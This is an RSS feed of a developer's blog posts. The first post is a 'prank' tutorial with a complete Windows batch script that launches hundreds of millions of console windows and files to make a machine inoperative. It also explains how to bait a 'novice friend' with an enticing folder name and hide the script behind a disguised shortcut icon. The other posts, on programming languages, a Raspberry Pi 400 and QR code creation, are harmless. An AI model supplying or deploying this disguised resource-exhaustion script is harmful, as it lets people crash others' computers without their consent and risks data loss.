<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Dantor24</title>
    <description>The latest articles on DEV Community by Dantor24 (@dantor24).</description>
    <link>https://dev.to/dantor24</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F789872%2F712e9f7b-207c-4b96-b3e3-f83b349ab707.png</url>
      <title>DEV Community: Dantor24</title>
      <link>https://dev.to/dantor24</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/dantor24"/>
    <language>en</language>
    <item>
      <title>Prank your friend with that fake virus ☢ ☣</title>
      <dc:creator>Dantor24</dc:creator>
      <pubDate>Wed, 16 Mar 2022 06:02:58 +0000</pubDate>
      <link>https://dev.to/dantor24/prank-your-friend-with-that-fake-virus-465g</link>
      <guid>https://dev.to/dantor24/prank-your-friend-with-that-fake-virus-465g</guid>
      <description>&lt;p&gt;I wanna show you an easy way to prank your novice friend just with this little script batch.I hope you have an editor on your computers such as notepad, vscode, or whatever. As far as I'm concerned, I'll use vscode to do the job. let's start!&lt;/p&gt;

&lt;h2&gt;
  
  
  Step1
&lt;/h2&gt;

&lt;p&gt;create a folder with a name that gets your friend's attention.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;example of name : top_movies_2022, tuto_python and so on&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--f6Fgu30X--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/62c92h7g00vk0jt33psh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--f6Fgu30X--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/62c92h7g00vk0jt33psh.png" alt="vscode screenshop" width="536" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Step2
&lt;/h2&gt;

&lt;p&gt;Create a file with the extension .bat and add the script below&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;set&lt;/span&gt; &lt;span class="kd"&gt;txt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"臭枓枕朕毂"&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="na"&gt;/L &lt;/span&gt;&lt;span class="vm"&gt;%%i&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="m"&gt;500000000&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt;  &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="nb"&gt;cmd&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;旃甡臭枓枕朕毂幹&lt;span class="nv"&gt;%%i%&lt;/span&gt;&lt;span class="kd"&gt;txt&lt;/span&gt;&lt;span class="err"&gt;%&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;😜 Don't worry about the Chinese symbols, it just created misunderstood file names. I create a loop with an excessive number that launches the console and create a file after each iteration. It will saturate the resources of the machine and will make it inoperative.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--i-DH979W--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z1d1zua72402ra2503lm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--i-DH979W--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z1d1zua72402ra2503lm.png" alt="script screenshot" width="859" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Step3
&lt;/h2&gt;

&lt;p&gt;hide your trick! To do this, we will create a shortcut and apply another icon, then hide the script file.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--f4naOdtN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wgpk7idzcvvocedqxm80.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--f4naOdtN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wgpk7idzcvvocedqxm80.gif" alt="gif tuto step 3" width="600" height="406"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;And now let's see the final result&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--80ShkMay--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2vv3qakvshwnlxw07auq.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--80ShkMay--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2vv3qakvshwnlxw07auq.gif" alt="gif final result" width="600" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>dos</category>
      <category>windows</category>
      <category>virus</category>
    </item>
    <item>
      <title>What language do you think will conquer the tech world for the next ten years to come.</title>
      <dc:creator>Dantor24</dc:creator>
      <pubDate>Sat, 19 Feb 2022 06:29:46 +0000</pubDate>
      <link>https://dev.to/dantor24/what-language-do-you-think-will-conquer-the-tech-world-for-the-next-ten-years-to-come-4g5d</link>
      <guid>https://dev.to/dantor24/what-language-do-you-think-will-conquer-the-tech-world-for-the-next-ten-years-to-come-4g5d</guid>
      <description>&lt;p&gt;As developers, we are all confronted with this question: what programming language should I learn without the risk of time-wasting? Because we have chosen a domain where things run so fast. And that gives us the impression we don't move. There are so many things to learn and so little time then what have we got as the choice: "python, Java, C#, Go, PHP, JS and so on"; at the end, where do we go. I think that depends on our goal; then you have to find a language either the community is growing or has acquired a certain maturity.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;From you to me with all these parameters to keep in mind, what language will survive.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
    </item>
    <item>
      <title>This Pi technology saved my life.</title>
      <dc:creator>Dantor24</dc:creator>
      <pubDate>Fri, 18 Feb 2022 16:20:11 +0000</pubDate>
      <link>https://dev.to/dantor24/this-pi-technology-saved-my-life-5bi7</link>
      <guid>https://dev.to/dantor24/this-pi-technology-saved-my-life-5bi7</guid>
      <description>&lt;p&gt;My laptop was broken and I didn't have the money to buy one. But luckily a few weeks before I had ordered a &lt;strong&gt;raspberry pi 400&lt;/strong&gt; just for testing it. Surprisingly, the resources of this little hardware were enough to do the job.&lt;br&gt;
during this period I worked on a website project. It was difficult at the start but after it was easy. The only stuff with this hardware it's you must be creative.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;some recommendations before trying this hardware:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;have a monitor to connect your raspberry pi 400.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;have a basic knowledge of the Linux terminal.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;be someone curious and so on.&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>raspberrypi</category>
    </item>
    <item>
      <title>an easy way to create your own QR Code</title>
      <dc:creator>Dantor24</dc:creator>
      <pubDate>Tue, 15 Feb 2022 16:46:57 +0000</pubDate>
      <link>https://dev.to/dantor24/an-easy-way-to-create-your-own-qr-code-elb</link>
      <guid>https://dev.to/dantor24/an-easy-way-to-create-your-own-qr-code-elb</guid>
      <description>&lt;ol&gt;
&lt;li&gt;Open your browser tap &lt;em&gt;&lt;a href="https://qrty.mobi"&gt;https://qrty.mobi&lt;/a&gt;&lt;/em&gt; in the URL or &lt;a href="https://qrty.mobi/my-qr-codes"&gt;click here&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;click on create QRCode 
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pWcsn3Sp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o8iwr9e1aflapbtjru1n.png" alt="Click on button create QRCode" width="880" height="320"&gt;
&lt;/li&gt;
&lt;li&gt;Choose a type of QRCode then click on next
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cwguckCV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4tt3zhmd6i9ktrratxum.png" alt="type of QRcode" width="880" height="372"&gt;
&lt;/li&gt;
&lt;li&gt;Fill the different fields and press next
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qNx3ZISS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/89dh91ntl4rhfl3wgien.png" alt="fill field" width="880" height="377"&gt;
&lt;/li&gt;
&lt;li&gt;Customize your QRCode Frame then next to finish the process 
&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--7QhRrYju--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/96d7glujnrmyb4z6vs8k.png" alt="custom QRCode" width="880" height="374"&gt;
&lt;/li&gt;
&lt;/ol&gt;

</description>
    </item>
  </channel>
</rss>
